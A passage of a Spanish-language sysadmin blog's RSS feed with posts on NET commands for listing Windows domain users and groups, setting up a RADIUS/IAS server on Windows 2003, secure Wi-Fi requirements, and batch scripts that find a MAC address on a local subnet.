		<comments>http://www.javcasta.com/2010/07/20/scripting-cmd-bat-listar-usuarios-y-grupos-del-dominio-y-otros-menesteres-por-consola-cmd/#comments</comments>
		<pubDate>Tue, 20 Jul 2010 13:30:10 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5769</guid>
		<description><![CDATA[Referencía: http://www.petri.co.il/list_all_users_and_groups_in_domain.htm Traduzco de la página de referencia: Inicio &#62; ejecutar &#62; cmd &#62; NET USERS /DOMAIN &#62;USERS.TXT This command will return the user accounts from the Primary Domain Controller (PDC) of the current domain, and write them to a file called USER.TXT Este comando devolverá las cuentas de usuario del Controlador de dominio primario [...]]]></description>
			<content:encoded><![CDATA[<p>Referencía:<a href="http://www.petri.co.il/list_all_users_and_groups_in_domain.htm" target="_blank"> http://www.petri.co.il/list_all_users_and_groups_in_domain.htm</a></p>
<p style="text-align: center;"><a href="http://centros5.pntic.mec.es/desanton/blogs/seclan/2006/09/modelo-bsico-de-red.html"><img class="size-full wp-image-5770    aligncenter" title="sample_network_diagram-730282" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/sample_network_diagram-730282.jpg" alt="" width="565" height="502" /></a></p>
<p>Traduzco de la página de referencia:</p>
<ul>
<li>Inicio &gt; ejecutar &gt; cmd &gt; <strong>NET USERS /DOMAIN &gt;USERS.TXT</strong></li>
</ul>
<blockquote><p><span style="color: #808080;"><em>This command  will return the user accounts from the Primary Domain Controller  (PDC)  of the current domain, and write them to a file called USER.TXT</em></span></p></blockquote>
<p>Este comando devolverá las cuentas de usuario del Controlador de dominio primario (PDC) de el dominio actual (corriente), y los escribe en un fichero llamado USER.TXT</p>
<ul>
<li><strong>NET ACCOUNTS /DOMAIN &gt;ACCOUNTS.TXT </strong></li>
</ul>
<blockquote><p><span style="color: #808080;"><em>This command  will return the account policy information from the PDC of the  current  domain, and write it to a file called ACCOUNTS.TXT</em></span></p></blockquote>
<p>Este comando devolverá la información de políticas de cuenta desde el PDC del dominio actual, y lo escribe en el fichero llamado ACCOUNTS.TXT</p>
<ul>
<li><strong>NET CONFIG SERVER &gt;SERVER.TXT </strong></li>
</ul>
<blockquote><p><span style="color: #808080;"><em>This command  will return the server name, version of Windows, active network  adapter  information/MAC address, Server hidden status, Maximum Logged On Users,   Maximum open files per session, Idle session time, and assign it to a  file  called SERVER.TXT</em></span></p></blockquote>
<p>Este comando devolverá el nombre del servidor, versión de windows, información, dirección MAC de capa 2,  del adaptador de red activo, estado de ocultación del servidor, Máximo de usuarios que pueden iniciar sesión, máximo de ficheros abiertos por sesión, tiempo de sesión idle, y lo escribe en el fichero llamado SERVER.TXT</p>
<ul>
<li><strong>NET CONFIG WORKSTATION &gt;WKST.TXT </strong></li>
</ul>
<blockquote><p><span style="color: #888888;"><em>This command  will return the workstation name, user name, version of Windows,   network adapter, network adapter information/MAC address, Logon domain,  COM Open  Timeout, COM Send Count, COM Send Timout, and write it to a  file called WKST.TXT.</em></span></p></blockquote>
<p>este comando devolverá el nombre de la máquina, nombre de usuario, versión de windows, adaptador de red, información del adaptador (Mac address), dominio donde se inicia sesión, tiempo limite de espera de COM open,  contador de COM enviados, &#8230;, y lo escribe en el fichero WKST.TXT</p>
<ul>
<li><strong>NET GROUP /DOMAIN &gt;DGRP.TXT </strong></li>
</ul>
<blockquote><p><span style="color: #888888;"><em>This command  will return the global groups on the PDC of the current domain,  and  write them to a file called GRP.TXT.</em></span></p></blockquote>
<p>Este comando devolverá los grupos globales en el PDC del dominio actual, y lo escribirá el el fichero GRP.TXT</p>
<ul>
<li><strong>NET LOCALGROUP &gt;LGRP.TXT </strong></li>
</ul>
<blockquote><p><span style="color: #888888;"><em>This command  will return the local groups on the local machine, and write  them to a  file call LGRP.TXT.</em></span></p></blockquote>
<p>Obrtendremos los grupos locales de la máquina en LGRP.TXT</p>
<ul>
<li><strong><span style="color: #333333;">NET VIEW /DOMAIN:DOMAINNAME &gt;VIEW.TXT </span></strong></li>
</ul>
<blockquote><p><span style="color: #808080;"><em>This command  will return the resources in the specified domain, and write  them to a  file called VIEW.TXT.</em></span></p></blockquote>
<p><span style="color: #808080;"><span style="color: #000000;">Recursos compartidos del dominio en el fichero VIEW.TXT</span><br />
</span></p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/20/scripting-cmd-bat-listar-usuarios-y-grupos-del-dominio-y-otros-menesteres-por-consola-cmd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Implementación de un servidor Radius &#8211; Internet Autenthication Service bajo Radius en Windows 2003 Server</title>
		<link>http://www.javcasta.com/2010/07/18/implementacion-de-un-servidor-radius-internet-autenthication-service-bajo-radius-en-windows-2003-server/</link>
		<comments>http://www.javcasta.com/2010/07/18/implementacion-de-un-servidor-radius-internet-autenthication-service-bajo-radius-en-windows-2003-server/#comments</comments>
		<pubDate>Sun, 18 Jul 2010 20:51:17 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5724</guid>
		<description><![CDATA[Implementación de un servidor Radius &#8211; InternetAutenthication Service bajo Radius en W2K3 Server Se aconseja implementar IAS en un DC ( controlador de dominio ). Pero la condición necesaria bajo windows es que donde se implemente tenga configurado el AD ( directorio activo ). nota: Por defecto, IAS almacena los logs en ficheros en el [...]]]></description>
			<content:encoded><![CDATA[<h4><span style="text-decoration: underline;">Implementación de un servidor Radius &#8211; InternetAutenthication Service bajo Radius en W2K3 Server</span></h4>
<p>Se aconseja implementar IAS en un DC ( controlador de dominio ). Pero la condición necesaria bajo windows es<br />
que donde se implemente tenga configurado el AD ( directorio activo ).<br />
nota: Por defecto, IAS almacena los logs en ficheros en el path = %systemroot%\LogFiles\IAS\* . Se puede<br />
configurar para que los almacene en bbdd como SQL server<br />
nota: Hay una alternativa free y open source a IAS/Radius de microsoft : http://www.freeradius.org/ que se suele<br />
implementar bajo Debian<br />
* <em><strong>Agregar o quitar componentes de windows &gt; Certificates Services</strong></em><br />
Nota: el servidor web IIS (internet information server )tiene que estar activado y por ende el interprete de scripts de<br />
el lado de el servidor ASP ( active server page)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-1.jpg"><img class="size-full wp-image-5725  aligncenter" title="Radius-IAS-w2k3-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-1.jpg" alt="" width="647" height="517" /></a></p>
<p style="text-align: left;">* Tipo de CA  (Autoridad Certificadora): Enterprise root CA (puesto que tenemos un dominio y ningun otro CA)</p>
<p style="text-align: left;">Continuar:<span id="more-5724"></span></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-2.jpg"><img class="size-full wp-image-5726  aligncenter" title="Radius-IAS-w2k3-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-2.jpg" alt="" width="614" height="487" /></a></p>
<p style="text-align: left;">* Tipo de encriptación para el par privado y público de llaves</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-3.jpg"><img class="size-full wp-image-5727  aligncenter" title="Radius-IAS-w2k3-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-3.jpg" alt="" width="511" height="550" /></a></p>
<p style="text-align: left;">* identificación del CA</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-4.jpg"><img class="size-full wp-image-5728  aligncenter" title="Radius-IAS-w2k3-4" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-4.jpg" alt="" width="537" height="545" /></a></p>
<p style="text-align: left;">* Opciones de la bbdd ( base de datos) de certificados</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-5.jpg"><img class="size-full wp-image-5729  aligncenter" title="Radius-IAS-w2k3-5" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-5.jpg" alt="" width="578" height="468" /></a></p>
<p style="text-align: left;">* ASP (Active Server Pages en IIS) debe de estar activo</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-6.jpg"><img class="size-full wp-image-5730  aligncenter" title="Radius-IAS-w2k3-6" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-6.jpg" alt="" width="578" height="469" /></a></p>
<p style="text-align: left;"><strong>* Agregar componentes de windows &gt; Servicios de red &gt; Internet Authentication Service</strong></p>
<p style="text-align: center;"><strong><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-7.jpg"><img class="size-full wp-image-5731  aligncenter" title="Radius-IAS-w2k3-7" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-7.jpg" alt="" width="649" height="533" /></a></strong></p>
<p>* Bajar el certificado: <strong>http://localhost_o_nombre_servidor/certsrv<br />
</strong></p>
<p style="text-align: left;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-8.jpg"><img class="size-full wp-image-5732  aligncenter" title="Radius-IAS-w2k3-8" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-8.jpg" alt="" width="657" height="522" /></a><br />
* Solicitar un certificado e instalarlo</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-9.jpg"><img class="size-full wp-image-5733  aligncenter" title="Radius-IAS-w2k3-9" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-9.jpg" alt="" width="591" height="364" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-10.jpg"><img class="size-full wp-image-5734  aligncenter" title="Radius-IAS-w2k3-10" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-10.jpg" alt="" width="456" height="520" /></a></p>
<p style="text-align: left;"><strong>* Herramientas administrativas &gt; IAS : Configurar los clientes Radius</strong> ( en este caso serán los APs )</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-11.jpg"><img class="size-full wp-image-5735  aligncenter" title="Radius-IAS-w2k3-11" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-11.jpg" alt="" width="590" height="474" /></a></p>
<p style="text-align: left;">* Añadimos los clientes radius</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-12.jpg"><img class="size-full wp-image-5736    aligncenter" title="Radius-IAS-w2k3-12" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-12.jpg" alt="" width="601" height="594" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-13.jpg"><img class="size-full wp-image-5737  aligncenter" title="Radius-IAS-w2k3-13" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-13.jpg" alt="" width="602" height="593" /></a></p>
<p style="text-align: left;">* Políticas de acceso remoto</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-14.jpg"><img class="size-full wp-image-5738  aligncenter" title="Radius-IAS-w2k3-14" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-14.jpg" alt="" width="622" height="519" /></a></p>
<p style="text-align: left;">* Definir método de acceso ( Al ser APs conectados a un switch seria via  Ethernet  )</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-15.jpg"><img class="size-full wp-image-5739  aligncenter" title="Radius-IAS-w2k3-15" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-15.jpg" alt="" width="573" height="451" /></a></p>
<p style="text-align: left;">* usuario o grupo de acceso</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-16.jpg"><img class="size-full wp-image-5740  aligncenter" title="Radius-IAS-w2k3-16" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-16.jpg" alt="" width="575" height="453" /></a></p>
<p style="text-align: left;">* Método de autenticación</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-17.jpg"><img class="size-full wp-image-5741  aligncenter" title="Radius-IAS-w2k3-17" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-17.jpg" alt="" width="574" height="451" /></a></p>
<p style="text-align: left;">* Método de configuración de políticas</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-18.jpg"><img class="size-full wp-image-5742  aligncenter" title="Radius-IAS-w2k3-18" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-18.jpg" alt="" width="573" height="453" /></a></p>
<p style="text-align: left;">* Seleccionar tipo de atributo a añadir</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-19.jpg"><img class="size-full wp-image-5743  aligncenter" title="Radius-IAS-w2k3-19" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-19.jpg" alt="" width="610" height="470" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-20.jpg"><img class="size-full wp-image-5744    aligncenter" title="Radius-IAS-w2k3-20" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-20.jpg" alt="" width="590" height="467" /></a></p>
<p style="text-align: left;">* Politica de condiciones de las conexiones</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-21.jpg"><img class="size-full wp-image-5745  aligncenter" title="Radius-IAS-w2k3-21" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-21.jpg" alt="" width="575" height="449" /></a></p>
<p style="text-align: left;">* Denegar o permitir el acceso remoto a los usuarios que tengan las condiciones especificadas</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-22.jpg"><img class="size-full wp-image-5746  aligncenter" title="Radius-IAS-w2k3-22" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-22.jpg" alt="" width="572" height="449" /></a></p>
<p style="text-align: left;">* Editar perfiles</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-23.jpg"><img class="size-full wp-image-5747  aligncenter" title="Radius-IAS-w2k3-23" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-23.jpg" alt="" width="571" height="453" /></a></p>
<p style="text-align: left;">* editar dial-in perfil</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-24.jpg"><img class="size-full wp-image-5748  aligncenter" title="Radius-IAS-w2k3-24" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-24.jpg" alt="" width="462" height="531" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-25.jpg"><img class="size-full wp-image-5749    aligncenter" title="Radius-IAS-w2k3-25" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-25.jpg" alt="" width="465" height="531" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-26.jpg"><img class="size-full wp-image-5750  aligncenter" title="Radius-IAS-w2k3-26" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-26.jpg" alt="" width="462" height="532" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-27.jpg"><img class="size-full wp-image-5751  aligncenter" title="Radius-IAS-w2k3-27" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-27.jpg" alt="" width="610" height="596" /></a></p>
<p style="text-align: left;">* tipo de EAP</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-28.jpg"><img class="size-full wp-image-5752  aligncenter" title="Radius-IAS-w2k3-28" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-28.jpg" alt="" width="615" height="539" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-29.jpg"><img class="size-full wp-image-5753  aligncenter" title="Radius-IAS-w2k3-29" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/Radius-IAS-w2k3-29.jpg" alt="" width="642" height="536" /></a></p>
<p style="text-align: left;">* Solo queda :Configuración del certificado en los clientes ( estaciones bajo Windows XP Pro, ojo el Home Edition no vale )</p>
<p style="text-align: left;">
<p style="text-align: left;">
<p style="text-align: left;">xxx</p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/18/implementacion-de-un-servidor-radius-internet-autenthication-service-bajo-radius-en-windows-2003-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Networking: Implementación de una red wireless segura</title>
		<link>http://www.javcasta.com/2010/07/18/networking-implementacion-de-una-red-wireless-segura/</link>
		<comments>http://www.javcasta.com/2010/07/18/networking-implementacion-de-una-red-wireless-segura/#comments</comments>
		<pubDate>Sun, 18 Jul 2010 13:20:00 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5721</guid>
		<description><![CDATA[Documento Recuperado de un proyecto para un cliente Implementación de una red wireless segura Condiciones: solo se citan las condiciones relevantes que afectan a la configuración e implementación técnicaCondiciones de la Arquitectura:WIFI-ARCH-002: Direccionamiento de capa 3 cumplirá el RFC 1918 ( IPs privadas )WIFI-ARCH-003: Red wifi segmentada (router) y filtrada (firewall) de la red de [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: left;"><span style="color: #888888;"><em>Documento Recuperado de un proyecto para un cliente</em></span></p>
<h1 style="text-align: left;"><span style="text-decoration: underline;">Implementación de una red wireless segura</span></h1>
<p style="text-align: left;"><strong><span style="text-decoration: underline;">Condiciones</span></strong>: solo se citan las condiciones relevantes que afectan a la configuración e implementación técnica<br /><strong><span style="text-decoration: underline;">Condiciones de la Arquitectura:</span></strong><br />WIFI-ARCH-002: Direccionamiento de capa 3 cumplirá el RFC 1918 ( IPs privadas )<br />WIFI-ARCH-003: Red wifi segmentada (router) y filtrada (firewall) de la red de cable ethernet. La solución<br />más obvia es un firewall Watchguard ( ¿ usar el firewall del cpd del cliente o uno distinto ?)</p>
<p style="text-align: center;">Posible Topologia física</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/07/wireless-segura-1.jpg"><img class="aligncenter size-full wp-image-5722" title="wireless-segura-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/07/wireless-segura-1.jpg" alt="" width="590" height="436" /></a></p>
<p style="text-align: left;">WIFI-ARCH-004: Los equipos de segmentación y filtrado de la red wifi deben cumplir el standard TSP<br />Internet<br />nota: TSP Internet = http://www.ietf.org/rfc/rfc3161.txt<br />(Internet X.509 Public Key Infrastructure Time-Stamp Protocol (TSP) )o a tuneles para IPv6</p>
<p style="text-align: left;"><strong><span style="text-decoration: underline;">Condiciones de la Configuración</span></strong>:<br />WIFI-CONF-001: Acceso a la re wifi protegido mediante identificación y autenticación<br />WIFI-CONF-002: La identificación de la red wifi ( SSID) deberá cumplir con:<br />- SSID distinta de la identificación por defecto de los equipos<br />- SSID de dificil descubrimiento que no hagan referencia al nombre del cliente ( ocultación SSID )<br />- Se recomienda cambiar la SSID cada año</p>
<p>WIFI-CONF-003: Modo abierto ( open mode) deshabilitado.<br /> WIFI-CONF-004: Deshabilitado el broadcast del SSID por los APs<br /> WIFI-CONF-005: Usar 802.11i standard ( también conocido como WPA2) y WPA basado en TKIP y AES.<br /> (Advanced encription standar )<br /> WIFI-CONF-006: la longitud de las llaves de encriptación AES &gt;= 128 bits<br /> WIFI-CONF-007: Si número de direcciones clientes de la red wifi &lt; 15 entonces aplicar filtrado de MAC<br /> WIFI-CONF-008: Encriptación de los ficheros del HD de toda estación que sea cliente de la red wifi<br /> WIFI-CONF-009: Modo Ad-hoc deshabilitado<br /> WIFI-CONF-010: Intercambio de datos entre APs, solo mediante la red de cable<br /> WIFI-CONF-011: El acceso via wifi requiere autenticación dinámica mediane un ID enlazado a Radius<br /> WIFI-CONF-012: Los APs no deben enviar información técnica a los clientes<br /> WIFI-CONF-013: Todo acceso o su intento a la red wifi debe de ser registrado en ficheros ( logs)<br /> WIFI-CONF-014:Los ficheros logs deben almacenarse en un servidor dedicado ( ¿ servidor de radius puede<br /> ser el mismo que el de almacenamiento de logs ?)<br /> WIFI-CONF-015: los ficheros log permanecerán almacenados durante 1 año y despues del año borrados</p>
<p style="text-align: left;"><strong><span style="text-decoration: underline;">Condiciones de la Administración:</span></strong><br />WIFI-ADM-004: La gestión de los APs solo se hará desde la red de cable<br />WIFI-ADM-005: La gestión de los APs se efectuará solo mediante protocolos seguros ( https, ssh )<br />WIFI-ADM-006: Se deshabilitarán protocolos no seguros ( http, ftp, telnet,&#8230;)</p>
<p style="text-align: left;"> </p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/18/networking-implementacion-de-una-red-wireless-segura/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scripting &#8211; bat o cmd: Buscar mac en segmento de red de clase C</title>
		<link>http://www.javcasta.com/2010/07/06/scripting-bat-o-cmd-buscar-mac-en-segmento-de-red-de-clase-c/</link>
		<comments>http://www.javcasta.com/2010/07/06/scripting-bat-o-cmd-buscar-mac-en-segmento-de-red-de-clase-c/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 08:20:16 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5615</guid>
		<description><![CDATA[Usando getmac @echo off rem buscamac.cmd echo Segmento 192.168.0.0/24 ( 192.168.0.1-192.168.0.254 ) echo Introduce mac a buscar ( ejemplo: 00-11-21-a2-8c-80 ) set /P lamac= echo Nº de ecos del ping ( minimo:1, maximo:4) set /P necos= echo Escaneando red ... espere por favor for /L %%k in (1,1,254) do ( echo Escaneando IP: 192.168.0.%%k ... [...]]]></description>
			<content:encoded><![CDATA[<p>Usando getmac</p>
<pre class="brush: plain;">
@echo off
rem buscamac.cmd
echo Segmento 192.168.0.0/24 ( 192.168.0.1-192.168.0.254 )
echo Introduce mac a buscar ( ejemplo:  00-11-21-a2-8c-80 )
set /P lamac=
echo Nº de ecos del ping ( minimo:1, maximo:4)
set /P necos=
echo Escaneando red ... espere por favor
for /L %%k in (1,1,254) do (
 echo Escaneando IP: 192.168.0.%%k ...
 @echo 192.168.0.%%k &gt;&gt; tabla_ip_mac.txt
 getmac /S 192.168.0.%%k &gt;&gt; tabla_ip_mac.txt
)
echo.
echo Fin escaneo por icmp
@find &quot;%lamac%&quot; tabla_ip_mac.txt
pause
rem by javier castañón 2007
</pre>
<p>O usando arp</p>
<pre class="brush: plain;">
@echo off
rem buscamac.cmd
echo Segmento 192.168.0.0/24 ( 192.168.0.1-192.168.0.254 )
echo Introduce mac a buscar ( ejemplo:  00-11-21-a2-8c-80 )
set /P lamac=
echo Nº de ecos del ping ( minimo:1, maximo:4)
set /P necos=
echo Escaneando red mediante icmp ... espere por favor
for /L %%k in (1,1,254) do (
 echo Escaneando IP: 192.168.0.%%k ...
 echo.
 ping -n %necos% 192.168.0.%%k &gt;&gt; elping.txt
 arp -a 192.168.0.%%k &gt;&gt; tabla_ip_mac.txt
)
echo.
echo Fin escaneo por icmp
@find &quot;%lamac%&quot; tabla_ip_mac.txt
pause
rem by javier castañón 2007
</pre>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/07/06/scripting-bat-o-cmd-buscar-mac-en-segmento-de-red-de-clase-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
